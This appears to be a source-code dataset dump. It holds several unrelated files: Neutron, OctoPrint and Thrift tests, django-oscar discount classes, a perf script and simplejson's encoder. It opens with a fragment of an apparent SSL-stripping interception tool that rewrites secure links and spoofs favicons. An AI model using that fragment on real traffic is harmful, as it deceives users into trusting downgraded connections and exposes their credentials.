elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
| gpl-3.0 |
jerryz1982/neutron | neutron/tests/unit/extensions/test_extraroute.py | 4 | 22953 | # Copyright 2013, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from webob import exc
from neutron.common import constants
from neutron.db import extraroute_db
from neutron.extensions import extraroute
from neutron.extensions import l3
from neutron.openstack.common import uuidutils
from neutron.tests.unit.api.v2 import test_base
from neutron.tests.unit.extensions import test_l3 as test_l3
LOG = logging.getLogger(__name__)
_uuid = uuidutils.generate_uuid
_get_path = test_base._get_path
class ExtraRouteTestExtensionManager(object):
def get_resources(self):
l3.RESOURCE_ATTRIBUTE_MAP['routers'].update(
extraroute.EXTENDED_ATTRIBUTES_2_0['routers'])
return l3.L3.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
# This plugin class is for tests with plugin that integrates L3.
class TestExtraRouteIntPlugin(test_l3.TestL3NatIntPlugin,
extraroute_db.ExtraRoute_db_mixin):
supported_extension_aliases = ["external-net", "router", "extraroute"]
# A fake l3 service plugin class with extra route capability for
# plugins that delegate away L3 routing functionality
class TestExtraRouteL3NatServicePlugin(test_l3.TestL3NatServicePlugin,
extraroute_db.ExtraRoute_db_mixin):
supported_extension_aliases = ["router", "extraroute"]
class ExtraRouteDBTestCaseBase(object):
def _routes_update_prepare(self, router_id, subnet_id,
port_id, routes, skip_add=False):
if not skip_add:
self._router_interface_action('add', router_id, subnet_id, port_id)
self._update('routers', router_id, {'router': {'routes': routes}})
return self._show('routers', router_id)
def _routes_update_cleanup(self, port_id, subnet_id, router_id, routes):
self._update('routers', router_id, {'router': {'routes': routes}})
self._router_interface_action('remove', router_id, subnet_id, port_id)
def test_route_update_with_one_route(self):
routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(body['router']['routes'], routes)
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_route_clear_routes_with_None(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._routes_update_prepare(r['router']['id'],
None, p['port']['id'], routes)
body = self._update('routers', r['router']['id'],
{'router': {'routes': None}})
self.assertEqual(body['router']['routes'], [])
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_router_interface_in_use_by_route(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(body['router']['routes'], routes)
self._router_interface_action(
'remove',
r['router']['id'],
None,
p['port']['id'],
expected_code=exc.HTTPConflict.code)
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_route_update_with_multi_routes(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(sorted(body['router']['routes']),
sorted(routes))
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_routes_update_for_multiple_routers(self):
routes1 = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.0.3'}]
routes2 = [{'destination': '12.0.0.0/8',
'nexthop': '10.0.0.4'}]
with self.router() as r1,\
self.router() as r2,\
self.subnet(cidr='10.0.0.0/24') as s:
with self.port(subnet=s) as p1, self.port(subnet=s) as p2:
body = self._routes_update_prepare(r1['router']['id'],
None, p1['port']['id'],
routes1)
self.assertEqual(body['router']['routes'], routes1)
body = self._routes_update_prepare(r2['router']['id'],
None, p2['port']['id'],
routes2)
self.assertEqual(body['router']['routes'], routes2)
self._routes_update_cleanup(p1['port']['id'],
None, r1['router']['id'], [])
self._routes_update_cleanup(p2['port']['id'],
None, r2['router']['id'], [])
def test_router_update_delete_routes(self):
routes_orig = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
routes_left = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes_orig)
self.assertEqual(sorted(body['router']['routes']),
sorted(routes_orig))
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes_left,
skip_add=True)
self.assertEqual(sorted(body['router']['routes']),
sorted(routes_left))
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def _test_malformed_route(self, routes):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
self._update('routers', r['router']['id'],
{'router': {'routes': routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_no_destination_route(self):
self._test_malformed_route([{'nexthop': '10.0.1.6'}])
def test_no_nexthop_route(self):
self._test_malformed_route({'destination': '135.207.0.0/16'})
def test_none_destination(self):
self._test_malformed_route([{'destination': None,
'nexthop': '10.0.1.3'}])
def test_none_nexthop(self):
self._test_malformed_route([{'destination': '135.207.0.0/16',
'nexthop': None}])
def test_nexthop_is_port_ip(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
port_ip = p['port']['fixed_ips'][0]['ip_address']
routes = [{'destination': '135.207.0.0/16',
'nexthop': port_ip}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_too_many_routes(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'},
{'destination': '192.168.0.0/16',
'nexthop': '10.0.1.6'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_dup_address(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_invalid_ip_address(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '512.207.0.0/16',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
routes = [{'destination': '127.207.0.0/48',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
routes = [{'destination': 'invalid_ip_address',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_invalid_nexthop_ip(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '127.207.0.0/16',
'nexthop': ' 300.10.10.4'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_nexthop_is_outside_port_subnet(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '127.207.0.0/16',
'nexthop': ' 20.10.10.4'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_on_external_port(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
self._set_net_external(s['subnet']['network_id'])
self._add_external_gateway_to_router(
r['router']['id'],
s['subnet']['network_id'])
body = self._show('routers', r['router']['id'])
net_id = body['router']['external_gateway_info']['network_id']
self.assertEqual(net_id, s['subnet']['network_id'])
port_res = self._list_ports(
'json',
200,
s['subnet']['network_id'],
tenant_id=r['router']['tenant_id'],
device_owner=constants.DEVICE_OWNER_ROUTER_GW)
port_list = self.deserialize('json', port_res)
self.assertEqual(len(port_list['ports']), 1)
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
body = self._update('routers', r['router']['id'],
{'router': {'routes':
routes}})
body = self._show('routers', r['router']['id'])
self.assertEqual(body['router']['routes'],
routes)
self._remove_external_gateway_from_router(
r['router']['id'],
s['subnet']['network_id'])
body = self._show('routers', r['router']['id'])
gw_info = body['router']['external_gateway_info']
self.assertIsNone(gw_info)
def test_router_list_with_sort(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_sort('router', (router3, router2, router1),
[('name', 'desc')])
def test_router_list_with_pagination(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_pagination('router',
(router1, router2, router3),
('name', 'asc'), 2, 2)
def test_router_list_with_pagination_reverse(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_pagination_reverse('router',
(router1, router2,
router3),
('name', 'asc'), 2, 2)
class ExtraRouteDBIntTestCase(test_l3.L3NatDBIntTestCase,
ExtraRouteDBTestCaseBase):
def setUp(self, plugin=None, ext_mgr=None):
if not plugin:
plugin = ('neutron.tests.unit.extensions.test_extraroute.'
'TestExtraRouteIntPlugin')
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForIntTests, self).setUp(plugin=plugin,
ext_mgr=ext_mgr)
self.setup_notification_driver()
class ExtraRouteDBSepTestCase(test_l3.L3NatDBSepTestCase,
ExtraRouteDBTestCaseBase):
def setUp(self):
# the plugin without L3 support
plugin = 'neutron.tests.unit.extensions.test_l3.TestNoL3NatPlugin'
# the L3 service plugin
l3_plugin = ('neutron.tests.unit.extensions.test_extraroute.'
'TestExtraRouteL3NatServicePlugin')
service_plugins = {'l3_plugin_name': l3_plugin}
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForSepTests, self).setUp(
plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.setup_notification_driver()
| apache-2.0 |
senttech/OctoPrint | tests/plugin/test_types_blueprint.py | 9 | 4161 | import unittest
import mock
import octoprint.plugin
class BlueprintPluginTest(unittest.TestCase):
def setUp(self):
self.basefolder = "/some/funny/basefolder"
self.plugin = octoprint.plugin.BlueprintPlugin()
self.plugin._basefolder = self.basefolder
class MyAssetPlugin(octoprint.plugin.BlueprintPlugin, octoprint.plugin.AssetPlugin):
def get_asset_folder(self):
return "/some/asset/folder"
class MyTemplatePlugin(octoprint.plugin.BlueprintPlugin, octoprint.plugin.TemplatePlugin):
def get_template_folder(self):
return "/some/template/folder"
self.assetplugin = MyAssetPlugin()
self.assetplugin._basefolder = self.basefolder
self.templateplugin = MyTemplatePlugin()
self.templateplugin._basefolder = self.basefolder
def test_route(self):
def test_method():
pass
octoprint.plugin.BlueprintPlugin.route("/test/method", methods=["GET"])(test_method)
octoprint.plugin.BlueprintPlugin.route("/test/method/{foo}", methods=["PUT"])(test_method)
self.assertTrue(hasattr(test_method, "_blueprint_rules"))
self.assertTrue("test_method" in test_method._blueprint_rules)
self.assertTrue(len(test_method._blueprint_rules["test_method"]) == 2)
self.assertListEqual(test_method._blueprint_rules["test_method"], [
("/test/method", dict(methods=["GET"])),
("/test/method/{foo}", dict(methods=["PUT"]))
])
def test_errorhandler(self):
def test_method():
pass
octoprint.plugin.BlueprintPlugin.errorhandler(404)(test_method)
self.assertTrue(hasattr(test_method, "_blueprint_error_handler"))
self.assertTrue("test_method" in test_method._blueprint_error_handler)
self.assertTrue(len(test_method._blueprint_error_handler["test_method"]) == 1)
self.assertListEqual(test_method._blueprint_error_handler["test_method"], [
404
])
def test_get_blueprint_kwargs(self):
import os
expected = dict(
static_folder=os.path.join(self.basefolder, "static"),
template_folder=os.path.join(self.basefolder, "templates")
)
result = self.plugin.get_blueprint_kwargs()
self.assertEqual(result, expected)
def test_get_blueprint_kwargs_assetplugin(self):
import os
expected = dict(
static_folder=self.assetplugin.get_asset_folder(),
template_folder=os.path.join(self.basefolder, "templates")
)
result = self.assetplugin.get_blueprint_kwargs()
self.assertEqual(result, expected)
def test_get_blueprint_kwargs_templateplugin(self):
import os
expected = dict(
static_folder=os.path.join(self.basefolder, "static"),
template_folder=self.templateplugin.get_template_folder()
)
result = self.templateplugin.get_blueprint_kwargs()
self.assertEqual(result, expected)
def test_get_blueprint(self):
import os
expected_kwargs = dict(
static_folder=os.path.join(self.basefolder, "static"),
template_folder=os.path.join(self.basefolder, "templates")
)
class MyPlugin(octoprint.plugin.BlueprintPlugin):
@octoprint.plugin.BlueprintPlugin.route("/some/path", methods=["GET"])
def route_method(self):
pass
@octoprint.plugin.BlueprintPlugin.errorhandler(404)
def errorhandler_method(self):
pass
@octoprint.plugin.BlueprintPlugin.route("/hidden/path", methods=["GET"])
def _hidden_method(self):
pass
plugin = MyPlugin()
plugin._basefolder = self.basefolder
plugin._identifier = "myplugin"
with mock.patch("flask.Blueprint") as MockBlueprint:
blueprint = mock.MagicMock()
MockBlueprint.return_value = blueprint
errorhandler = mock.MagicMock()
blueprint.errorhandler.return_value = errorhandler
result = plugin.get_blueprint()
self.assertEqual(result, blueprint)
MockBlueprint.assert_called_once_with("plugin.myplugin", "myplugin", **expected_kwargs)
blueprint.add_url_rule.assert_called_once_with("/some/path", "route_method", view_func=plugin.route_method, methods=["GET"])
blueprint.errorhandler.assert_called_once_with(404)
errorhandler.assert_called_once_with(plugin.errorhandler_method)
def test_get_blueprint_cached(self):
blueprint = mock.MagicMock()
self.plugin._blueprint = blueprint
result = self.plugin.get_blueprint()
self.assertEqual(blueprint, result)
| agpl-3.0 |
mexeniz/django-oscar | src/oscar/apps/offer/benefits.py | 22 | 11536 | from decimal import Decimal as D
from django.utils.translation import ugettext_lazy as _
from oscar.apps.offer import conditions, results, utils
from oscar.core.loading import get_model
from oscar.templatetags.currency_filters import currency
Benefit = get_model('offer', 'Benefit')
__all__ = [
'PercentageDiscountBenefit', 'AbsoluteDiscountBenefit', 'FixedPriceBenefit',
'ShippingBenefit', 'MultibuyDiscountBenefit',
'ShippingAbsoluteDiscountBenefit', 'ShippingFixedPriceBenefit',
'ShippingPercentageDiscountBenefit',
]
def apply_discount(line, discount, quantity):
"""
Apply a given discount to the passed basket
"""
line.discount(discount, quantity, incl_tax=False)
class PercentageDiscountBenefit(Benefit):
"""
An offer benefit that gives a percentage discount
"""
_description = _("%(value)s%% discount on %(range)s")
@property
def name(self):
return self._description % {
'value': self.value,
'range': self.range.name}
@property
def description(self):
return self._description % {
'value': self.value,
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Percentage discount benefit")
verbose_name_plural = _("Percentage discount benefits")
def apply(self, basket, condition, offer, discount_percent=None,
max_total_discount=None):
if discount_percent is None:
discount_percent = self.value
discount_amount_available = max_total_discount
line_tuples = self.get_applicable_lines(offer, basket)
discount = D('0.00')
affected_items = 0
max_affected_items = self._effective_max_affected_items()
affected_lines = []
for price, line in line_tuples:
if affected_items >= max_affected_items:
break
if discount_amount_available == 0:
break
quantity_affected = min(line.quantity_without_discount,
max_affected_items - affected_items)
line_discount = self.round(discount_percent / D('100.0') * price
* int(quantity_affected))
if discount_amount_available is not None:
line_discount = min(line_discount, discount_amount_available)
discount_amount_available -= line_discount
apply_discount(line, line_discount, quantity_affected)
affected_lines.append((line, line_discount, quantity_affected))
affected_items += quantity_affected
discount += line_discount
if discount > 0:
condition.consume_items(offer, basket, affected_lines)
return results.BasketDiscount(discount)
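    # Worked example (hypothetical basket): with value=25 and a single
    # applicable line priced at 10.00 with quantity 2, line_discount is
    # 25 / 100 * 10.00 * 2 = 5.00, subject to self.round() and to any
    # max_total_discount cap passed in by the caller.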
class AbsoluteDiscountBenefit(Benefit):
"""
An offer benefit that gives an absolute discount
"""
_description = _("%(value)s discount on %(range)s")
@property
def name(self):
return self._description % {
'value': currency(self.value),
'range': self.range.name.lower()}
@property
def description(self):
return self._description % {
'value': currency(self.value),
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Absolute discount benefit")
verbose_name_plural = _("Absolute discount benefits")
def apply(self, basket, condition, offer, discount_amount=None,
max_total_discount=None):
if discount_amount is None:
discount_amount = self.value
# Fetch basket lines that are in the range and available to be used in
# an offer.
line_tuples = self.get_applicable_lines(offer, basket)
# Determine which lines can have the discount applied to them
max_affected_items = self._effective_max_affected_items()
num_affected_items = 0
affected_items_total = D('0.00')
lines_to_discount = []
for price, line in line_tuples:
if num_affected_items >= max_affected_items:
break
qty = min(line.quantity_without_discount,
max_affected_items - num_affected_items)
lines_to_discount.append((line, price, qty))
num_affected_items += qty
affected_items_total += qty * price
# Ensure we don't try to apply a discount larger than the total of the
# matching items.
discount = min(discount_amount, affected_items_total)
if max_total_discount is not None:
discount = min(discount, max_total_discount)
if discount == 0:
return results.ZERO_DISCOUNT
# Apply discount equally amongst them
affected_lines = []
applied_discount = D('0.00')
for i, (line, price, qty) in enumerate(lines_to_discount):
if i == len(lines_to_discount) - 1:
# If last line, then take the delta as the discount to ensure
# the total discount is correct and doesn't mismatch due to
# rounding.
line_discount = discount - applied_discount
else:
# Calculate a weighted discount for the line
line_discount = self.round(
((price * qty) / affected_items_total) * discount)
apply_discount(line, line_discount, qty)
affected_lines.append((line, line_discount, qty))
applied_discount += line_discount
condition.consume_items(offer, basket, affected_lines)
return results.BasketDiscount(discount)
class FixedPriceBenefit(Benefit):
"""
An offer benefit that gives the items in the condition for a
fixed price. This is useful for "bundle" offers.
Note that we ignore the benefit range here and only give a fixed price
for the products in the condition range. The condition cannot be a value
condition.
We also ignore the max_affected_items setting.
"""
_description = _("The products that meet the condition are sold "
"for %(amount)s")
@property
def name(self):
return self._description % {
'amount': currency(self.value)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Fixed price benefit")
verbose_name_plural = _("Fixed price benefits")
def apply(self, basket, condition, offer): # noqa (too complex (10))
if isinstance(condition, conditions.ValueCondition):
return results.ZERO_DISCOUNT
# Fetch basket lines that are in the range and available to be used in
# an offer.
line_tuples = self.get_applicable_lines(offer, basket,
range=condition.range)
if not line_tuples:
return results.ZERO_DISCOUNT
# Determine the lines to consume
num_permitted = int(condition.value)
num_affected = 0
value_affected = D('0.00')
covered_lines = []
for price, line in line_tuples:
if isinstance(condition, conditions.CoverageCondition):
quantity_affected = 1
else:
quantity_affected = min(
line.quantity_without_discount,
num_permitted - num_affected)
num_affected += quantity_affected
value_affected += quantity_affected * price
covered_lines.append((price, line, quantity_affected))
if num_affected >= num_permitted:
break
discount = max(value_affected - self.value, D('0.00'))
if not discount:
return results.ZERO_DISCOUNT
# Apply discount to the affected lines
discount_applied = D('0.00')
last_line = covered_lines[-1][1]
for price, line, quantity in covered_lines:
if line == last_line:
# If last line, we just take the difference to ensure that
# rounding doesn't lead to an off-by-one error
line_discount = discount - discount_applied
else:
line_discount = self.round(
discount * (price * quantity) / value_affected)
apply_discount(line, line_discount, quantity)
discount_applied += line_discount
return results.BasketDiscount(discount)
class MultibuyDiscountBenefit(Benefit):
_description = _("Cheapest product from %(range)s is free")
@property
def name(self):
return self._description % {
'range': self.range.name.lower()}
@property
def description(self):
return self._description % {
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Multibuy discount benefit")
verbose_name_plural = _("Multibuy discount benefits")
def apply(self, basket, condition, offer):
line_tuples = self.get_applicable_lines(offer, basket)
if not line_tuples:
return results.ZERO_DISCOUNT
# Cheapest line gives free product
discount, line = line_tuples[0]
apply_discount(line, discount, 1)
affected_lines = [(line, discount, 1)]
condition.consume_items(offer, basket, affected_lines)
return results.BasketDiscount(discount)
# =================
# Shipping benefits
# =================
class ShippingBenefit(Benefit):
def apply(self, basket, condition, offer):
condition.consume_items(offer, basket, affected_lines=())
return results.SHIPPING_DISCOUNT
class Meta:
app_label = 'offer'
proxy = True
class ShippingAbsoluteDiscountBenefit(ShippingBenefit):
_description = _("%(amount)s off shipping cost")
@property
def name(self):
return self._description % {
'amount': currency(self.value)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Shipping absolute discount benefit")
verbose_name_plural = _("Shipping absolute discount benefits")
def shipping_discount(self, charge):
return min(charge, self.value)
class ShippingFixedPriceBenefit(ShippingBenefit):
_description = _("Get shipping for %(amount)s")
@property
def name(self):
return self._description % {
'amount': currency(self.value)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Fixed price shipping benefit")
verbose_name_plural = _("Fixed price shipping benefits")
def shipping_discount(self, charge):
if charge < self.value:
return D('0.00')
return charge - self.value
class ShippingPercentageDiscountBenefit(ShippingBenefit):
_description = _("%(value)s%% off of shipping cost")
@property
def name(self):
return self._description % {
'value': self.value}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Shipping percentage discount benefit")
verbose_name_plural = _("Shipping percentage discount benefits")
def shipping_discount(self, charge):
discount = charge * self.value / D('100.0')
return discount.quantize(D('0.01'))
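        # Worked example (hypothetical charge): with value=10, a 20.00 shipping
        # charge is discounted by 20.00 * 10 / 100 = 2.00 after quantizing to
        # two decimal places.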
| bsd-3-clause |
TEAM-Gummy/android_kernel_samsung_d2 | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
akshaydeo/thrift | test/py/TestSocket.py | 99 | 2888 | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys, glob
from optparse import OptionParser
parser = OptionParser()
parser.add_option('--genpydir', type='string', dest='genpydir', default='gen-py')
options, args = parser.parse_args()
del sys.argv[1:] # clean up hack so unittest doesn't complain
sys.path.insert(0, options.genpydir)
sys.path.insert(0, glob.glob('../../lib/py/build/lib.*')[0])
from ThriftTest import ThriftTest
from ThriftTest.ttypes import *
from thrift.transport import TTransport
from thrift.transport import TSocket
from thrift.protocol import TBinaryProtocol
import unittest
import time
import socket
import random
from optparse import OptionParser
class TimeoutTest(unittest.TestCase):
def setUp(self):
for i in xrange(50):
try:
# find a port we can use
self.listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = random.randint(10000, 30000)
self.listen_sock.bind(('localhost', self.port))
self.listen_sock.listen(5)
break
except:
if i == 49:
raise
def testConnectTimeout(self):
starttime = time.time()
try:
leaky = []
for i in xrange(100):
socket = TSocket.TSocket('localhost', self.port)
socket.setTimeout(10)
socket.open()
leaky.append(socket)
except:
self.assert_(time.time() - starttime < 5.0)
def testWriteTimeout(self):
starttime = time.time()
try:
socket = TSocket.TSocket('localhost', self.port)
socket.setTimeout(10)
socket.open()
lsock = self.listen_sock.accept()
while True:
socket.write("hi" * 100)
except:
self.assert_(time.time() - starttime < 5.0)
suite = unittest.TestSuite()
loader = unittest.TestLoader()
suite.addTest(loader.loadTestsFromTestCase(TimeoutTest))
testRunner = unittest.TextTestRunner(verbosity=2)
testRunner.run(suite)
| apache-2.0 |
zhangh43/incubator-hawq | tools/bin/ext/simplejson/encoder.py | 62 | 13024 | """
Implementation of JSONEncoder
"""
import re
try:
from simplejson import _speedups
except ImportError:
_speedups = None
ESCAPE = re.compile(r'[\x00-\x19\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"/]|[^\ -~])')
ESCAPE_DCT = {
# escape all forward slashes to prevent </script> attack
'/': '\\/',
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
# assume this produces an infinity on all machines (probably not guaranteed)
INFINITY = float('1e66666')
def floatstr(o, allow_nan=True):
# Check for specials. Note that this type of test is processor- and/or
# platform-specific, so do tests which don't depend on the internals.
if o != o:
text = 'NaN'
elif o == INFINITY:
text = 'Infinity'
elif o == -INFINITY:
text = '-Infinity'
else:
return repr(o)
if not allow_nan:
raise ValueError("Out of range float values are not JSON compliant: %r"
% (o,))
return text
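# Illustration (assumed inputs): floatstr(1.5) falls through to repr() and gives
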